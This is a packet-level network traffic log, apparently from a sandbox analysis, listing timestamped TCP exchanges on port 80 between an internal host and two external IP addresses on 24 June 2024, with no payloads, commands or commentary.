Jun 24, 2024 00:10:21.919080019 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.919089079 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919102907 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.919122934 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.919126034 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919138908 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919177055 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.919194937 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919203997 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.919208050 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919238091 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.919270992 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919274092 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.919284105 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919312954 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.919320107 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919332027 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919332027 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.919383049 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.919431925 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919442892 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919454098 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919465065 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919487953 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.919519901 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.919640064 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919651031 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919661999 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919672966 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919682980 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919707060 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.919719934 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919727087 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.919732094 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919744015 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919754982 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919765949 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919769049 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.919810057 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.919833899 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.919842005 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919853926 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919864893 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919893026 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.919922113 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.919940948 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919950008 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919960976 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919971943 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919982910 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919991016 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.920022964 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.920022964 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.920135975 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.920145988 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.920157909 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.920167923 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.920178890 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.920191050 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.920191050 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.920202971 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.920221090 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.920255899 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.920274019 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.920284986 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.920311928 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.920324087 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.920324087 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.920334101 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.920368910 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.920403004 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.920519114 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.920536041 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.920547009 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.920558929 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.920569897 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.920578957 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.920579910 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.920593023 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.920603037 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.920614958 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.920619965 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.920627117 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.920650005 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.920681000 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.920847893 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.920866013 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.920876026 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.920887947 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.920893908 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.920902967 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.920911074 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.920916080 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.920928955 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.920941114 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.920950890 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.920959949 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.920962095 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.921005011 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.921036959 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.929039955 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.929049969 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.929060936 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.929116964 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.929128885 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.929131031 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.929131985 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.929141045 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.929153919 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.929189920 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.929222107 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.929277897 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.929290056 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.929301023 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.929318905 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.929333925 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.929361105 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.929377079 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.929395914 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.929413080 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.929424047 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.929452896 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.929488897 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.929686069 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.929727077 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.929738045 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.929738998 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.929769039 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.929797888 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.929824114 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.929836035 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.929846048 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.929857969 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.929894924 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.929925919 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.930063963 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.930075884 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.930088043 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.930099010 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.930110931 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.930118084 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.930123091 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.930135965 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.930157900 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.930187941 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.930243015 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.930290937 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.930326939 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.930345058 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.930356979 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.930366039 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.930396080 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.930432081 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.930443048 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.930454016 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.930459023 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.930469990 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.930486917 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.930529118 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.930533886 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.930578947 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.930619955 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.930630922 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.930643082 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.930653095 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.930660963 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.930664062 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.930685043 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.930733919 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.931009054 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.931056023 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.931056976 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.931068897 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.931101084 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.931133032 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.931134939 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.931147099 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.931185007 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.931222916 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.931235075 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.931246042 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.931257963 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.931268930 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.931271076 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.931281090 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.931304932 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.931317091 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.931425095 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.931435108 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.931444883 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.931479931 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.931503057 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.931592941 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.931647062 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.931668997 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.931714058 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.931742907 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.931790113 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.931790113 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.931801081 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.931813002 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.931833982 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.931863070 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.931927919 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.931940079 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.931950092 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.931960106 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.931972980 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.931973934 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.931996107 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.932019949 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.932071924 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.932084084 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.932096004 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.932105064 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.932142019 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.932179928 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.932356119 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.932394981 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.932415009 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.932425976 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.932460070 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.932487965 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.932499886 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.932512045 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.932543039 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.932595015 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.932605982 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.932617903 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.932629108 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.932641029 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.932652950 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.932684898 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.932734013 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.932744980 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.932755947 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.932765961 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.932776928 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.932816982 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.932878017 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.932920933 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.932920933 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.932931900 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.932964087 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.932981014 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.933080912 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.933092117 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.933103085 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.933115005 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.933124065 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.933130026 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.933172941 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.933212042 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.933223009 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.933234930 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.933248997 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.933255911 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.933260918 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.933271885 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.933286905 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.933310032 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.933336973 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.933382034 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.933409929 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.933422089 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.933433056 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.933444977 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.933465004 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.933520079 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.933615923 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.933626890 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.933638096 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.933646917 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.933660030 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.933667898 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.933671951 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.933682919 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.933693886 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.933695078 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.933706045 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.933738947 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.933764935 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.933964968 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.933981895 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.933991909 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.934003115 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.934011936 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.934015036 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.934026003 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.934036970 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.934041977 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.934078932 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.967197895 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.967259884 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.967305899 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.967319965 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.967340946 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.967350006 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.967353106 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.967391968 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.967438936 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.967449903 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.967461109 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.967482090 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.967500925 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.975397110 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.975414038 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.975430012 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.975440979 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.975450993 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.975461006 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.975466013 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.975471973 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.975498915 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.975500107 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.975529909 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.975543022 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.975558996 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.975591898 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.975615978 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.975641012 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.975651026 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.975662947 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.975701094 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.975724936 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.975738049 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.975749016 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.975759029 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.975771904 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.975785971 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.975797892 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.975833893 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.999521017 CEST	80	49726	185.172.128.116	192.168.2.5
